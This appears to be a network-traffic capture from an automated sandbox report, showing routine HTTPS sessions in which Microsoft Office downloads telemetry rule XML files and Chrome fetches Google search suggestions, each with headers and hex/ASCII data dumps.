                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    11192.168.2.74971813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:22 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:23 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 467
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080623Z-174f7845968n2hr8hC1EWR9cag0000000w80000000008hrm
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    12192.168.2.74971913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:22 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:27 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080627Z-174f7845968j6t2phC1EWRcfe80000000wv00000000040fb
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:27 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    13192.168.2.74972013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:23 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080623Z-174f7845968psccphC1EWRuz9s0000000wxg000000004khq
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    14192.168.2.74972113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:23 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080623Z-174f7845968psccphC1EWRuz9s0000000wtg00000000cmny
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    15192.168.2.74972213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:23 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080623Z-174f7845968cdxdrhC1EWRg0en0000000wn00000000057xv
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    16192.168.2.749727142.250.181.684437876C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:23 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:23 GMT
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-IKwFn-MH37PJxAzGkzHYZQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC124INData Raw: 64 32 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 68 61 72 6c 69 65 20 62 72 6f 77 6e 20 74 68 61 6e 6b 73 67 69 76 69 6e 67 22 2c 22 6e 79 20 72 61 6e 67 65 72 73 20 74 72 61 64 65 20 72 75 6d 6f 72 73 22 2c 22 72 6f 63 6b 73 74 61 72 20 67 61 6d 65 73 20 67 74 61 20 36 22 2c 22 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 20 73 74 6f 72 6d 22 2c 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: d28)]}'["",["charlie brown thanksgiving","ny rangers trade rumors","rockstar games gta 6","weather forecast snow storm","
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 6e 61 73 61 20 67 72 65 65 6e 6c 61 6e 64 20 62 61 73 65 22 2c 22 6d 6f 61 6e 61 20 32 20 65 6e 64 20 63 72 65 64 69 74 73 20 73 63 65 6e 65 22 2c 22 69 70 6c 20 61 75 63 74 69 6f 6e 20 69 70 6c 20 32 30 32 35 22 2c 22 6d 61 63 79 20 65 6d 70 6c 6f 79 65 65 20 65 78 70 65 6e 73 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65
                                                                                                                                                                                                                                                                                                                    Data Ascii: nasa greenland base","moana 2 end credits scene","ipl auction ipl 2025","macy employee expenses"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestde
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC1390INData Raw: 46 6c 4e 45 46 77 54 56 55 31 61 32 4a 5a 59 56 59 78 64 32 64 73 4e 57 52 6a 62 48 6c 53 52 47 4e 70 54 6e 52 78 59 6c 46 6e 53 31 46 30 59 57 78 47 56 33 63 79 51 53 39 6f 4f 56 5a 6b 61 44 6c 75 64 30 46 68 61 30 5a 36 53 45 4e 6f 4e 58 42 5a 4d 57 70 74 62 6a 4a 74 56 57 35 4e 65 56 70 47 64 32 4e 6c 54 47 70 77 54 48 6c 46 56 46 6f 31 56 32 78 6f 63 69 74 30 59 57 64 4d 53 6d 39 59 63 30 46 50 4f 53 74 75 61 7a 59 79 64 57 4a 33 57 57 6c 53 4d 46 4e 4f 4d 30 64 73 65 6a 46 57 53 6e 6c 48 57 57 56 43 56 33 52 73 65 48 52 44 56 55 38 34 61 56 46 58 56 6e 56 48 5a 32 46 4b 56 57 39 69 52 48 70 52 4e 7a 46 79 51 30 68 50 55 45 35 6b 62 47 70 42 54 55 46 4c 59 58 4e 31 4b 32 64 73 53 6d 56 34 63 48 49 76 51 55 4e 73 59 6c 4e 32 62 57 73 33 61 6c 56 7a 62
                                                                                                                                                                                                                                                                                                                    Data Ascii: FlNEFwTVU1a2JZYVYxd2dsNWRjbHlSRGNpTnRxYlFnS1F0YWxGV3cyQS9oOVZkaDlud0Fha0Z6SENoNXBZMWptbjJtVW5NeVpGd2NlTGpwTHlFVFo1V2xocit0YWdMSm9Yc0FPOStuazYydWJ3WWlSMFNOM0dsejFWSnlHWWVCV3RseHRDVU84aVFXVnVHZ2FKVW9iRHpRNzFyQ0hPUE5kbGpBTUFLYXN1K2dsSmV4cHIvQUNsYlN2bWs3alVzb
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:24 UTC471INData Raw: 52 6d 64 74 65 44 52 4c 61 48 4a 4f 54 48 46 5a 62 54 52 4f 62 6a 56 43 59 55 6b 30 63 47 68 73 62 7a 56 76 56 45 59 30 61 6d 63 76 54 6d 67 30 65 45 31 6a 65 54 64 35 56 6a 46 46 63 54 56 30 64 56 6c 73 56 6d 51 32 63 58 64 55 57 47 45 35 57 47 70 4e 59 32 64 7a 53 7a 42 6f 4d 55 56 57 59 6d 70 54 57 58 45 30 55 6e 64 43 53 45 74 6a 59 54 42 56 4f 56 52 78 52 6b 70 56 63 57 78 4c 63 58 4a 4a 64 57 70 7a 5a 6b 39 74 59 6b 64 77 57 45 64 72 4f 46 5a 30 64 6d 68 51 51 6e 52 4b 51 31 56 5a 4f 55 4a 77 55 6c 5a 68 62 48 4a 56 59 6b 6c 56 51 32 4a 4b 63 7a 64 4d 56 6a 6c 6b 56 47 45 78 51 58 70 51 55 46 5a 4d 61 31 6c 75 61 45 35 45 4e 6c 68 4a 4f 45 5a 44 62 6b 56 51 51 6a 42 50 54 57 4d 35 52 6c 6c 51 54 6e 56 76 52 32 70 31 51 57 46 4b 53 54 4a 49 64 54 42
                                                                                                                                                                                                                                                                                                                    Data Ascii: RmdteDRLaHJOTHFZbTRObjVCYUk0cGhsbzVvVEY0amcvTmg0eE1jeTd5VjFFcTV0dVlsVmQ2cXdUWGE5WGpNY2dzSzBoMUVWYmpTWXE0UndCSEtjYTBVOVRxRkpVcWxLcXJJdWpzZk9tYkdwWEdrOFZ0dmhQQnRKQ1VZOUJwUlZhbHJVYklVQ2JKczdMVjlkVGExQXpQUFZMa1luaE5ENlhJOEZDbkVQQjBPTWM5RllQTnVvR2p1QWFKSTJIdTB
